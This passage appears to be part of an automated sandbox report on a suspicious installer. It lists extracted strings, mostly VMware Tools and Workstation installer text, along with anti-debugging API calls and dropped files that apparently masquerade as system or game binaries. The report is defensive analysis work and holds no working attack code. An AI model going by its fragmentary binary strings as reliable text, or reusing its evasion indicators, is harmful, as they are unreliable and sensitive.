Using first time install logic.[Warning] Msi product code %s doesn't match resource version %sProductVersionProductCode and szCommandLine = %s{null}[Info] Calling MsiInstallProduct with szInstallPath = %s[Info] Setting Internal UI level[Error] Failed to initialize msi API[Error] Operation %s is not valid for a package[Error] Operation %s is not valid for a patchCannot get short temp path for VC8 dll installer.Launching VC8 dll installer failed with %d.Cannot install VC8 dlls as non-admin.vcredist_x64.exevm_vc8SP1.log ARPSYSTEMCOMPONENT=1" /C:"msiexec -i vcredist.msi -qn -leom+ /Qvcredist_x86.exe[Info] Windows Installer is already correct version[Info] Upgrade of Windows Installer is requested[Info] Windows Installer has been upgraded[Info] Upgrade of Windows Installer is requested[Info] Running setup files from "%s"\[Info] User cancelled bootstrapper.[Error] The SFX file size is incorrect[Error] Failed to extract SFX files: %d[Info] Install cancelled by the user[Error] Failed to create extract directory "%s" (%d)[Error] Failed to delete extract directory "%s"[Error] Failed to create extract directory "%s": %d[Error] Failed to get temp path name: %d[Info] FreeBytes: %I64d Needed Bytes: %I64d[Info] Extracting setup files to "%s"%s%s~setup\[Info] Total unpacked size will be %u%s%sTRANSFORMS=:TRANSFORMS=%s.mst[Info] User chose to cancel clean operation[Error] Unable to create UI Thread Error = 0x%x[Info] UI thread started successfully[Error] User doesn't have required admin privileges[Error] Another instance of setup is already running[Error] This OS is n
                    Source: winPre2k.iso.0.drBinary or memory string: 2) When installing on an English VM, double click "VMware Tools.msi"
                    Source: winPre2k.iso.0.drBinary or memory string: VMware, Inc.1>0<
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: Uninstalling 64 bit hgfs driver
                    Source: winPre2k.iso.0.drBinary or memory string: 1998-2014 VMware, Inc.L
                    Source: winPre2k.iso.0.drBinary or memory string: msiexec -i "D:\VMware Tools.msi"
                    Source: winPre2k.iso.0.drBinary or memory string: ndig{&MSSansBold8}&BenutzerdefiniertAgreeToLicenseIch akzeptiere die Bedingungen der Lizenzvereinbarung &nichtIch &akzeptiere die Bedingungen der LizenzvereinbarungVMwareToolsServiceVMware Tools-DienstBietet Unterst
                    Source: wm.exe.0.drBinary or memory string: vmware.SnapshotGrid
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: glicht Anwendungen auf diesem Gast, auf Informationen zu Status und Leistung der virtuellen Maschinen zuzugreifen.HgfsOrdnerfreigabenErm
                    Source: winPre2k.iso.0.drBinary or memory string: 1998-2014 VMware, Inc.B
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: ZBOS_RebootrebootOS_HalthaltOS_SuspendsuspendOS_ResumeresumeOS_PowerOnpoweronUpgraderTcloCapReg: Failed to register HGFS server capability.
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.dialog.loginVca.caption)Enter your VMware vCloud Air credentials.
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: BHgfs
                    Source: winPre2k.iso.0.drBinary or memory string: jVMware Tools
                    Source: winPre2k.iso.0.drBinary or memory string: ProductNameVMware ToolsL
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: vmGuestLibJava.jar
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: System\CurrentControlSet\Services\hgfs\networkprovider
                    Source: winPre2k.iso.0.drBinary or memory string: VMware Product Installation
                    Source: winPre2k.iso.0.drBinary or memory string: 1998-2014 VMware, Inc.<
                    Source: winPre2k.iso.0.drBinary or memory string: VMWARETO.EXE;1RR
                    Source: wm.exe.0.drBinary or memory string: XUI_HOMEPAGE_VMWARE
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareToolsUpgrader9x.exe
                    Source: wm.exe.0.drBinary or memory string: QXUI_HOMEPAGE_NEWVM@&!*@*@(msg.vmui.statusHome.newVMAction.title)Create a New Virtual MachineXUI_HOMEPAGE_OPENVM@&!*@*@(msg.vmui.statusHome.openVMAction.title)Open a Virtual MachineXUI_HOMEPAGE_CONNECT@&!*@*@(msg.vmui.statusHome.connectAction.title)Connect to a Remote Server@&!*@*@(msg.vmui.statusHome.connectAction.desc)View and manage virtual machines on a remote server.XUI_HOMEPAGE_CONNECT_VCA@&!*@*@(msg.vmui.statusHome.connectVCAAction.title)Connect to VMware vCloud Air@&!*@*@(msg.vmui.statusHome.connectVCAAction.desc)View and manage virtual machines on VMware vCloud Air.XUI_HOMETABVBUTTONHomeTabVButton.xuiXUI_HOMETABHBUTTONHomeTabHButton.xuiTitleTrialPeriodInfoTrialPeriodInfoIconTrialPeriodSummaryTrialPeriodButtonsXUI_HOMEPAGE_ATTENTIONXUI_HOMEPAGE_FEEDBACKXUI_HOMETABHomeTab.xuiTitlePictureXUI_HOMEPAGE_TITLEBackgroundXUI_HOMEPAGE_BGLogoPictureXUI_HOMEPAGE_VMWAREMainButtonGridBody
                    Source: winPre2k.iso.0.drBinary or memory string: SOFTWARE\VMware, Inc.\%s
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.collectSupportData.toolsServiceState)VMware Tools
                    Source: winPre2k.iso.0.drBinary or memory string: {3C49C4A4-7456-4C6A-8100-9134D915C1C9}vm_support.vbs{18DCC119-F229-4C61-A45F-5106B0BD7232}zip.exe{9E271638-C517-47E3-95E9-457227DE4A2C}ALLCLA~1.HTM|allclasses-frame.htmlALLCLA~2.HTM|allclasses-noframe.htmlCONSTA~1.HTM|constant-values.htmlGUESTS~1.PDF|GuestSDK_Terms_and_Conditions.pdfHELP-D~1.HTM|help-doc.htmlINCLUD~1.H|includeCheck.hINDEX~1.HTM|index.htmlINDEX-~1.HTM|index-all.htmlOVERVI~1.HTM|overview-summary.htmlOVERVI~2.HTM|overview-tree.htmlPACKAG~1.HTM|package-frame.htmlPACKAG~1|package-listPACKAG~2.HTM|package-summary.htmlPACKAG~3.HTM|package-tree.htmlSERIAL~1.HTM|serialized-form.htmlSTYLES~1.CSS|stylesheet.cssVM_BAS~1.H|vm_basic_types.h10337.7.0.1450VMGUES~1.DLL|vmGuestLib.dllVMGUES~1.H|vmGuestLib.hVMGUES~1.LIB|vmGuestLib.libVMGUES~1.HTM|VMGuestLibErrorException.htmlVMGUES~2.HTM|VMGuestLibHandle.htmlVMGUES~3.HTM|VMGuestLibInterface.htmlVMGUESTJ.DLL|vmGuestLibJava.dllVMGUES~1.JAR|vmGuestLibJava.jarVMGUES~2.LIB|vmGuestLibJava.libVMGUES~1.C|vmGuestLibTest.cVMSESS~1.H|vmSessionId.h7.2.2.0hgfs.sys7.2.4.0vmmemctl.sysVM-SUP~1.VBS|vm-support.vbsvmmouse.inf12.4.0.2vmmouse.sys4.0.0.95011.6.0.4vmx_fb.dllvmx_mode.dllvmx_svga.infvmx_svga.sys2.0.1.7vmxnet.sys6.8.4.05.0.2195.1vmxfrlog.exe|VMwareXferlogs.exe4.71.1460.1COMCAT.3207D1B0_80E5_11D2_B95D_006097C4DE24Redist.3207D1B0_80E5_11D2_B95D_006097C4DE24.:Redist.:MSMS.3207D1B0_80E5_11D2_B95D_006097C4DE24System.3207D1B0_80E5_11D2_B95D_006097C4DE24comcat.dllGlobal_Controls_COMCATDLL.3207D1B0_80E5_11D2_B95D_006097C4DE24Global_Controls_COMCATDLL_f0.3207D1B0_80E5_11D2_B95D_006097C4DE24BothThreadingModelCLSID\{0002E005-0000-0000-C000-000000000046}\InprocServer32Global_Controls_COMCATDLL_r0.3207D1B0_80E5_11D2_B95D_006097C4DE24+Component CategoriesGlobal_Controls_COMCATDLL_r1.3207D1B0_80E5_11D2_B95D_006097C4DE24Embeddable Objects409Component 
Categories\{40FC6ED3-2438-11CF-A3DB-080036F12502}Global_Controls_COMCATDLL_r2.3207D1B0_80E5_11D2_B95D_006097C4DE24ControlsComponent Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502}Global_Controls_COMCATDLL_r3.3207D1B0_80E5_11D2_B95D_006097C4DE24Automation ObjectsComponent Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502}Global_Controls_COMCATDLL_r4.3207D1B0_80E5_11D2_B95D_006097C4DE24Document ObjectsComponent Categories\{40FC6ED8-2438-11CF-A3DB-080036F12502}Global_Controls_COMCATDLL_r5.3207D1B0_80E5_11D2_B95D_006097C4DE24_Printable ObjectsComponent Categories\{40FC6ED9-2438-11CF-A3DB-080036F12502}Global_Controls_COMCATDLL_r6.3207D1B0_80E5_11D2_B95D_006097C4DE24Component Categories ManagerInprocServer32{0002E005-0000-0000-C000-000000000046}{3207
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.statusVM.vmNetWorksUnavailable)Network information is not available
                    Source: common.dll.0.drBinary or memory string: WQLSELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=TRUEroot\cimv2Win32_NetworkAdapterConfigurationSetDNSServerSearchOrderDNSServerSearchOrderIndexCaptionvmwarevirtualWin32_NetworkAdapterConfiguration.Index=%d[repair_dns] success.
                    Source: wm.exe.0.drBinary or memory string: #HPVMListReg::DeleteInstance: Timed out.Software\VMware, Inc.\Running VM List.Default\wui::util::VMListReg::CreateRegistryEventwui::util::VMListReg::CreateShutdownEventVMListReg::Register - Invalid key.
                    Source: winPre2k.iso.0.drBinary or memory string: VMware Tools Upgrader: Failed to format error message
                    Source: winPre2k.iso.0.drBinary or memory string: VMware, Inc.
                    Source: winPre2k.iso.0.drBinary or memory string: VMWARE_T.MSI;1RR
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: vmGuestLib.dll
                    Source: wm.exe.0.drBinary or memory string: vmware.exe
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareService.exe
                    Source: winPre2k.iso.0.drBinary or memory string: Win32 VMware Tools
                    Source: winPre2k.iso.0.drBinary or memory string: 8) Select the "VMware SVGA II" display adapter and click
                    Source: wm.exe.0.drBinary or memory string: vmwarestring.dll
                    Source: winPre2k.iso.0.drBinary or memory string: C:\Program Files\VMware
                    Source: winPre2k.iso.0.drBinary or memory string: @STATICVMware, Inc.
                    Source: winPre2k.iso.0.drBinary or memory string: name="VMware.VMware.toolsinstutil"
                    Source: wm.exe.0.drBinary or memory string: ProductNameVMware WorkstationP
                    Source: wm.exe.0.drBinary or memory string: OriginalFilenamevmware.exeF
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: s vmGuestLibJava.dll
                    Source: winPre2k.iso.0.drBinary or memory string: t du service VMwareVM_Stop9xService_SetDataVM_StopTrayArr
                    Source: winPre2k.iso.0.drBinary or memory string: suspend-vm-default.batresume-vm-default.batpoweroff-vm-default.batpoweron-vm-default.batinstall %d "%s" "%s" %dinstutil64.exeInstalling 64-bit PnP device: %sVMMEMCTL%s\Drivers\%svmmemctl.sysFailed to get system directory: %dUninstalling the WinNT memctl driverUnknown VM type: %dVMX is Express (WS)VMX is ESX (ESX)ESXVMX is Server (GSX)GSXVMX is ACE (WS)VMX is Workstation (WS)VM_TYPEWSInside a VMERROR: Not inside a VM. Exiting...UILevelChecking requirementsINSTALLME.txtINSTALL98.txtINSTALL95.txtShutdown9x.exetoolsuninst.dlluninstutil.dllVMTUninst.isuFailed to remove ARP key: %sRemoving legacy uninstall key from HKLM\%sSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VMware Tools\VMware Toolbox.lnkVMControlPanel.cplhook.dllVMwareUser.exeVMip.exe-uVMwareService.exe-killDnDManager.exeVMwareTray.exeTelling existing tray app to quitVMTBox.exeKilling old tools tray processFound old tools tray windowVMwareTrackCursorTrayIcon\C:\Program Files\VMwareFailed to get the old installation pathSOFTWARE\VMware, Inc.\VMware ToolsInstallPathCustomActionDataCleaning out legacy Tools filesFailed to clean-up registry settings for earlier per-user tools installation{B53D42E8-872B-430E-82D4-80065A31FCE1}{BA0EA5A0-F474-459F-ABF5-5BCC22965199}Invalid arguments for uninstalling legacy per-user tools installation;Cleaning out Tools files for legacy per-user installationsReboot not requiredSOFTWARE\VMware, Inc.\NeedRebootVMREBOOT1Reboot requiredChecking for rebootSOFTWARE\VMware, Inc.\VMware Tools\UninstallFilesDeleting extra filesStop9XServiceStopping the 9x serviceStopUserProcessOS not 9X, NT, or vistaStopping the user processLaunching the tray appLaunching the user app-iLaunching the Win9x service\CPelevated.dllRegistering the control panelUnregistering the control panelFailed to move source %s destination %s error %dFailed to create directory%s\%s%s%stools.confCan't find installation directoryCan't find tools config 
migration directoryMinor upgrade - migrating the tools conf settings<INSTALLDIR>Patching the default batch filesStarting %s installation: %sStarting %s uninstallation: %sReleasebuild-1463223unknown UI levelfull UIreduced UIbasic UIsilentInstalled##############################################################Finishing %s installation: %sFinishing %s uninstallation: %sSilentLOGEND_TYPEDESTINATION_PATHInstall95.txtInstall98.txtInstallME.txtInstallNT.txtinstall.txtSetting up manual video driver install instructionsFailed to patch source path bat file%s is set to run at rebootSoftware\Microsoft\Windows\CurrentVersion\RunOnceRestoreSourcePath#REGFILE#SourcePathregedit.exe/s /e "%s" HKEY_LOCAL_MACHINE\%sSoftware\Microsoft\Windows\CurrentVersion\SetupModifying SourcePath to %sSkipping source path modification%s\SourcePath.bat%s\SourcePath.regSUPPORTDIRDRIVER_VIDEOHacking source pathMANUAL_MOUSE_INSTALLFailed to install mouse driver: %dSuccessfully installed mouse driverCan't find video driver inf filevmmouse.infWin95 guest requires manual mouse driver installInstall
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: s vmGuestLibJava.jar
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: s!vmGuestLib.h|
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareToolsUpgrader9x.exePX$
                    Source: wm.exe.0.drBinary or memory string: The VMware Authorization Service is not running, so the virtual machine cannot be run in the background. You can power it off now.
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: VM_MigrateLegacySettings_SetDataVM_WriteHgfsRegistry
                    Source: winPre2k.iso.0.drBinary or memory string: \VMware
                    Source: winPre2k.iso.0.drBinary or memory string: <description>"VMware installation launcher"</description>
                    Source: wm.exe.0.drBinary or memory string: vmw_unity_windowvmware-vmx:host:PowerOnNoneSuspendPowerOffGuestShutdown@&!*@*@(button.wui.pageframe.ok)OK@&!*@*@(button.wui.pageframe.cancel)Cancel@&!*@*@(button.wui.pageframe.help)Help@&!*@*@(button.wui.pageframe.close)Close@&!*@*@(button.wui.pageframe.apply)&Apply@&!*@*@(button.wui.pageframe.back)< &Back@&!*@*@(button.wui.pageframe.next)&Next >@&!*@*@(button.wui.pageframe.finish)Finish@&!*@*@(button.wui.pageframe.authorize)&Unlock All Settings...RN!*
                    Source: winPre2k.iso.0.drBinary or memory string: 7) [VMware SVGA II]
                    Source: winPre2k.iso.0.drBinary or memory string: VMware-Produktinstallation
                    Source: wm.exe.0.drBinary or memory string: D:\build\ob\bora-17171714\bora\build\build\vmui\release\win32\vmware.pdb
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: GA"HgfsServerGetAccess: error: prefix too long
                    Source: winPre2k.iso.0.drBinary or memory string: Pinstmsia.exePA1031 1033 1036 10412002001{B53D42E8-872B-430E-82D4-80065A31FCE1};{3B410500-1802-488E-9EF1-4B11992E0440}INSTALLUPDPA{FE2F6A2C-196E-4210-9C04-2B1BC21F07EF}PAVMware ToolsPA0PAVmware Tools.msiPAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADD
INGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPA
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.menu.file.connectVCA)Connect to &VMware vCloud Air...
                    Source: wm.exe.0.drBinary or memory string: vmware.ThumbnailWindow
                    Source: wm.exe.0.drBinary or memory string: ?Initialize@vmnetcfg@util@wui@@YAXXZ"
                    Source: winPre2k.iso.0.drBinary or memory string: Couldn't find tray app windowPosted WM_QUIT to tray applicationVMwareTrayIconStopping the tray apptoolsERROR: 'toolinstall.end %i' command failedtoolinstall.end %cERROR: 'tools.set.version 0' command failedtools.set.version 0Sending the 'tools.set.version 0' RPC to the VMXSet %s feature state to %dERROR: Failed to set %s feature status: %dPerfSettingSYSTEM\CurrentControlSet\Services\Tcpip\ParametersTcpWindowSizeSetting performance settingsSYSTEM\CurrentControlSet\Services\DiskTimeOutValueSetting disk time-outSuccessfully installed graphics driverFailed to install graphics driverFailed to get address for InstallGraphicsDriverInstallGraphicsDriverFailed to load desk.cpl: %ddesk.cplFailed to delete inf filesFailed to find DrvrInstDeleteInfFiles: %dDrvrInstDeleteInfFilesDrvrInstRemoveDriverForClass returned: 0x%08xFailed to find DrvrInstRemoveDriverForClass: %dDrvrInstRemoveDriverForClassFailed to load %s: %dVMReportExpectedTicksHgfsVMXNetMemCtlMouseSVGADriversToolboxSetting feature statesUnmounting Tools image after successful installUnmounting Tools image after cancelled installUnmounting Tools image after failed installFailed to find DrvrInstInstallDriverForClass: %dDrvrInstInstallDriverForClassFailed to delete some per-user installer keys
                    Source: winPre2k.iso.0.drBinary or memory string: r Speichersteuerung wird installiertVM_InstallMouseDriver9xNTMaustreiber wird installiertVM_InstallVideoDriver9xSVGA-Treiber wird installiertVM_InstallVideoDriver9x_SetDataVM_InstallVideoDriverNTVM_InstallVMXNetDriverVMXNet-Treiber wird installiertVM_Launch9xServiceVMware-Dienst wird gestartetVM_Launch9xService_SetDataVM_LaunchTrayTaskleistenanwendung wird installiertVM_LaunchTray_SetDataVM_LaunchUserProcessVMware-Benutzeranwendung wird gestartetVM_LaunchUserProcess_SetDataVM_PatchBatchFilesBatchdateien werden gepatchtVM_Stop9xServiceVMware-Dienst wird angehaltenVM_Stop9xService_SetDataVM_StopTrayTaskleistenanwendung wird angehaltenVM_StopUserProcessVMware-Benutzeranwendung wird angehaltenVM_UninstallMemctlDriverNTSpeichersteuerungstreiber wird deinstalliertVM_UninstallMouseDriverMaustreiber wird deinstalliertVM_UninstallVideoDriverSVGA-Treiber wird deinstalliertVM_UninstallVMXNetDriverVMXNet-Treiber wird deinstalliertWriteEnvironmentStringsWriteIniValuesINI-Dateiwerte werden geschriebenWriteRegistryValuesSystemregistrierungswerte werden geschriebenSchl
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: tat et aux performances d'une machine virtuelle.HgfsDossiers partag
                    Source: wm.exe.0.drBinary or memory string: Pvmware.LibraryWindow
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: s vmGuestLibJava.lib_win32-?,
                    Source: winPre2k.iso.0.drBinary or memory string: s vmmemctl.sysNTE*$
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareUser9x.exe
                    Source: winPre2k.iso.0.drBinary or memory string: SOFTWARE\VMware, Inc.
                    Source: wm.exe.0.drBinary or memory string: Software\VMware, Inc.\Running VM List
                    Source: wm.exe.0.drBinary or memory string: CompanyNameVMware, Inc.N
                    Source: wm.exe.0.drBinary or memory string: <description>"VMware Workstation"</description>
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: QA"HgfsServerGetAccess: error: prefix too long
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: VMGuestLibHandle.html
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: vmGuestLibJava.lib_win32
                    Source: winPre2k.iso.0.drBinary or memory string: vmmouse.infNTen
                    Source: winPre2k.iso.0.drBinary or memory string: Failed to delete key %s: %dWarning: Deleting a key that isn't empty: "%s\%s"Create Process failed: %dNo exit code returned from async processFailed to get process exit code: %dProcess returned %dAttempting to launch "%s"%sFailed to allocate space for command line%s %sFile "%s" doesn't existERROR: The file copy operation failed: %uCopy '%s' to '%s'Cannot copy non-existent file: %srDeleted file %sFailed to delete %s: %dAlready removed: %sDeleting %sTerminate Process failed: %dprocess terminated succesfullyProcess exited cleanly"%s" %sEmpty filename so exiting"%s" /s"%s" /u /s%s\regsvr32.exeFailed to get system directoryCan't register non-existent file: %sFailed to reset working directory to %s: %dDirect call to %s failed: %dSuccessfully %s dll: "%s\%s"registeredunregisteredFailed to find %s export in "%s"DllRegisterServerDllUnregisterServerFailed to load dll "%s\%s": %dFailed to set new working directory to %s: %dFailed to save old working directory: %dCan't %s non-existent dll: "%s"registerunregistervmreboot.tmpFailed to get temp pathChecking for reboot stateCould not find a backslash in: %sUnable to find(%d): %sDeleting fileset: %sCould not create directory %s (%d).\StringFileInfo\%s\%s%u,%u,%u,%uGetProcAddresss for Module32First failed %dModule32FirstGetProcAddresss for Process32Next failed %dProcess32NextGetProcAddresss for Process32First failed %dProcess32FirstGetProcAddresss for CreateToolhelp32Snapshot failed %dCreateToolhelp32SnapshotKernel32.dllFailed to remove directory, error %dFailed to find any child files or directories for %s, (%d)ExpandEnvironmentString string %s too long. 
Length %dUninstallFilesFailed to delete the temp file.Failed to open destination file for writing: %sFailed to make "%s" writeable: %dSetting read-only file as writeableFailed to open temporary file: %sReplacing "%s" with "%s" in file "%s"Failed to open temp file: %sFailed to expand temp path %s: %dFailed to open search file: %sCannot modify non-existent file: %s%TMP%\vmsrchTemp.txtInvalid delimiter for version %sVersion %s newer than %sVersion %s older than %sVersion %s same as %sProcess found %s with ID %dProcess list unavailable - can't find first processProcess list unavailableProcess *NOT* terminated: %sProcess terminated: %s%s with pid %d found in memory!%d is not a valid process ID.%s *NOT* found in memory.kernel32.dllMsiProcessMessage returned: %iPosting warning message %iFailed to set property: %dSetting property %s = %sMsiGetProperty failed for property %sGetting Property %s = %sFailed to get property %sVMware ToolsMEM_ALLOC %s:%d
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: VMUninstallHgfsDriverNT
                    Source: winPre2k.iso.0.drBinary or memory string: CompanyNameVMware, Inc.T
                    Source: winPre2k.iso.0.drBinary or memory string: InstallShieldTempPropDriversVMware
                    Source: winPre2k.iso.0.drBinary or memory string: lectionnez la carte graphique VMware SVGA II et cliquez sur OK.
                    Source: winPre2k.iso.0.drBinary or memory string: CompanyNameVMware, Inc.X
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: VMInstallHgfsDriverNT
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: uninstallHgfs
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: Installing the WinNT hgfs driver
                    Source: winPre2k.iso.0.drBinary or memory string: sinstallation de VMware ToolsBVMware Tools ne doit
                    Source: winPre2k.iso.0.drBinary or memory string: Deinstallation der VMware ToolsMDie VMware Tools sollten nur in einer virtuellen Maschine installiert werden.
                    Source: winPre2k.iso.0.drBinary or memory string: VMWARETO.EXE;1
                    Source: C:\ProgramData\RuntimeBroker.exeAPI call chain: ExitProcess graph end node
                    Source: C:\ProgramData\RuntimeBroker.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\Wegame\Wegame.exeProcess information queried: ProcessInformation
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046E313 IsDebuggerPresent,OutputDebugStringW,3_2_0046E313
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046CA3B __EH_prolog3_catch_GS,GetCommandLineW,SimpleUString::operator=,MessageBoxA,strcmp,?stamp_init@@YAXXZ,?stamp_point@@YAXPBD@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?get_client_id@util_client_info@ierd_tgp@@YAHXZ,?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAV45@@Z,?get_process_count@util_multi_instance@ierd_tgp@@YAHPBD@Z,?set_same_client_type_multi_instance@util_multi_instance@ierd_tgp@@YAX_N@Z,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?SetIsMultiInstance@Qos@qos@adapt_for_imports@ierd_tgp@@QAEX_N@Z,?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z,OutputDebugStringA,CreateMutexA,GetLastError,?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z,OpenEventA,SetEvent,CloseHandle,CloseHandle,CloseHandle,CloseHandle,?get_log_instance@base@@YAPAVILogger@1@XZ,GetCurrentProcess,TerminateProcess,?sync_proxy_settings@client_helper@net@ierd_tgp@@YAXXZ,_stricmp,_stricmp,?enable_static_detail_log@common@ierd_tgp@@YAX_N@Z,_stricmp,?enable_profile_on@common@ierd_tgp@@YAX_N@Z,_stricmp,?enable_offline_mode_on@common@ierd_tgp@@YAX_N@Z,_stricmp,?set_restart_after_update@common@ierd_tgp@@YAX_N@Z,?set_quick_login_uin@common@ierd_tgp@@YAXK@Z,?set_start_from_host@common@ierd_tgp@@YAX_N@Z,?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAV45@@Z,?enable_offline_mode_on@common@ierd_tgp@@YAX_N@Z,?set_offline_login_account@common@ierd_tgp@@YAX_K@Z,GetCommandLineW,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$ch